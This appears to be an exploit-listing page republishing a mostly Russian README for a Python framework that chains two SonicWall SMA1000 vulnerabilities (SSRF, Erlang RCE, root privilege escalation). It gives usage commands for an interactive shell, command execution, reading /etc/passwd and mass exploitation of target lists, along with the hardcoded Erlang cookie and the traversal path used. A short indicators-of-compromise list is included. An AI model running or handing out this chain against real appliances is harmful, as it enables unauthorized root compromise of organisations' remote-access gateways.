Sploitus

Exploit for CVE-2026-15409-15410-Framework

kitploit · 2026-09-03

Exploit Code

MARKDOWN175 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC4DY-CVE-2026-15409-15410-FRAMEWORK
![CVE-DoublePoC](https://assets.kitploit.com/production/public/readmes/39065/88443822a0455e64bbbd56bcdec4ffde4f482def127862d351bf1372d53704f6.png)

![CVE-2026-15409](https://img.shields.io/badge/CVE-2026--15409-red?style=for-the-badge&logo=common-vulnerabilities-and-exposures&logoColor=white) ![CVE-2026-15410](https://img.shields.io/badge/CVE-2026--15410-orange?style=for-the-badge&logo=common-vulnerabilities-and-exposures&logoColor=white) ![CVSS 10.0](https://img.shields.io/badge/CVSS-10.0-critical?style=for-the-badge&logo=common-vulnerabilities-and-exposures&logoColor=white) ![CISA KEV](https://img.shields.io/badge/CISA_KEV-Confirmed-blue?style=for-the-badge&logo=circle&logoColor=white)

![SSRF](https://img.shields.io/badge/SSRF-CVE--2026--15409-orange?style=for-the-badge&logo=cloudflare&logoColor=white) ![RCE](https://img.shields.io/badge/RCE-Erlang-blue?style=for-the-badge&logo=erlang&logoColor=white) ![Privesc](https://img.shields.io/badge/Privesc-CVE--2026--15410-green?style=for-the-badge&logo=linux&logoColor=white) ![Python 3.6+](https://img.shields.io/badge/Python-3.6+-blue?style=for-the-badge&logo=python&logoColor=white)

## [1] CVE-2026-15409 | [2] CVE-2026-15410

## SonicWall SMA1000 – SSRF → Erlang RCE → Root Privesc

**Фреймворк для эксплуатации и инструмент безопасного обнаружения**  
_Только для авторизованного тестирования безопасности._

* * *

## ⚖️ Правовое предупреждение и ответственное использование

**Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение.**

Авторы и соавторы не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут полную ответственность за получение явного письменного разрешения от владельца цели перед тестированием. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичными законами по всему миру.

Используя данное программное обеспечение, вы соглашаетесь:

  * Использовать его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
  * Соблюдать все применимые местные, государственные и федеральные законы.
  * Не использовать его для вредоносных, разрушительных или незаконных действий.



> ⚠️ **ПРЕДУПРЕЖДЕНИЕ:** Эта уязвимость активно эксплуатируется в реальных атаках. Несанкционированное использование может привести к серьёзным юридическим последствиям.

* * *

## 🔥 Обзор уязвимости

**CVE-2026-15409** — это критическая **неаутентифицированная подделка серверных запросов (SSRF)** в интерфейсе Work Place устройства SonicWall SMA1000.

**Как это работает:**

  1. Злоумышленник использует SSRF для туннелирования через конечную точку `wsproxy`.
  2. Это предоставляет доступ к внутренним службам распределения Erlang (порты 1050/8188).
  3. Используя жёстко заданную cookie по умолчанию, злоумышленник аутентифицируется на узле Erlang.
  4. Удалённое выполнение кода (RCE) достигается через вызовы `os:cmd/1`.
  5. Затем **CVE-2026-15410** используется для повышения привилегий до **root** через обход пути в AMC (Appliance Management Console).



**Ключевые факты:**

  * 📅 **Раскрыта:** 14 июля 2026 г.
  * ⚠️ **Оценка CVSS:** 10.0 (КРИТИЧЕСКАЯ)
  * 📋 **CISA KEV:** Добавлена 14 июля 2026 г. (Срок: 17 июля 2026 г.)
  * 🎯 **Затронутые продукты:** SMA 6210, SMA 7210, SMA 8200v
  * 🔄 **Исправленные версии:** 12.4.3-03453+ и 12.5.0-02835+



* * *

## 🛠️ Фреймворк эксплуатации (`exploit.py`)

**Полноценный эксплойт** связывает CVE-2026-15409 и CVE-2026-15410 для достижения компрометации на уровне root.

### ✨ Возможности:

* * *

## 📦 Установка и требования

### Предварительные требования:

  * Python 3.6+
  * `pip` (для библиотеки `requests`)



### Установка зависимостей:

root@kitploit:~
    
    
    pip install -r requirements.txt
    

### [!] Примечание: exploit.py использует собственную реализацию WebSocket — библиотека websockets не требуется. Библиотека requests нужна только для функции --detect.

# 🚀 Примеры использования

### [2] Фреймворк эксплуатации (exploit.py)

root@kitploit:~
    
    
    # Интерактивная оболочка на цели
    python exploit.py -u 192.168.1.100
    
    # Выполнение одной команды
    python exploit.py -u 192.168.1.100 --exec "id && whoami"
    
    # Чтение файла
    python exploit.py -u 192.168.1.100 --read-file /etc/passwd
    
    # Включение обнаружения SSRF перед эксплуатацией
    python exploit.py -u 192.168.1.100 --detect
    
    # Попытка повышения до root
    python exploit.py -u 192.168.1.100 --privesc
    
    # Массовая эксплуатация из файла (50 потоков)
    python exploit.py -l targets.txt -m 50 --exec "uname -a"
    
    # Пользовательский порт и путь
    python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
    
    # Режим канала (чтение команды из stdin)
    echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
    

### [2] Безопасная проверка (checker.py)

root@kitploit:~
    
    
    # Сканирование одной цели
    python checker.py https://192.168.1.100
    
    # Пользовательский порт и путь
    python checker.py 192.168.1.100 --port 8443 --path /workplace
    
    # Массовое сканирование из файла
    python checker.py --list targets.txt
    

## 🎯 Уязвимые версии

> ⚠️ **Важно:** Эти уязвимости не затрагивают межсетевые экраны SonicWall (SSL-VPN) и серию SMA 100.

* * *

## 🧠 Технические детали

### SSRF (CVE-2026-15409)

Конечная точка `wsproxy` на порту 443 принимает параметр `bmID`, начинающийся с `-3389`, и спецификацию `host:port`. Указывая `host=127.0.0.1` и `port=1050`, атакующие могут туннелироваться к внутренней службе распределения Erlang.

### Erlang RPC

Узел Erlang использует жёстко заданную cookie по умолчанию: `10ecad5b446e86864832904cd439b6b70262`. Это позволяет удалённо аутентифицироваться и выполнять любые вызовы `os:cmd/1`.

### Повышение до root (CVE-2026-15410)

После аутентификации эксплойт записывает shell-скрипт в `/var/tmp/` и инициирует конечную точку XML-RPC `remove_hotfix` AMC с обходом пути (`../../../../var/tmp/script.sh`), выполняя скрипт от имени root.

* * *

## 🔍 Индикаторы компрометации (IoCs)

SonicWall рекомендует проверять:

  * `extraweb_access.log` на наличие `/__api__/login` или `/__api__/logout` (статус 200)
  * `extraweb_access.log` на наличие `/wsproxy` с подозрительными параметрами host (статус 101)
  * `ctrl-service.log` на наличие откатов исправлений с обходом пути
  * `/var/lib/unit/conf.json`, содержащий маршруты для `/__api__/login` или `/__api__/logout`



* * *

## 📚 Ссылки

  * NVD - CVE-2026-15409
  * SonicWall Advisory (SNWLID-2026-0008)
  * CISA KEV Catalog
  * The Hacker News - Two SonicWall SMA 1000 Zero-Days Exploited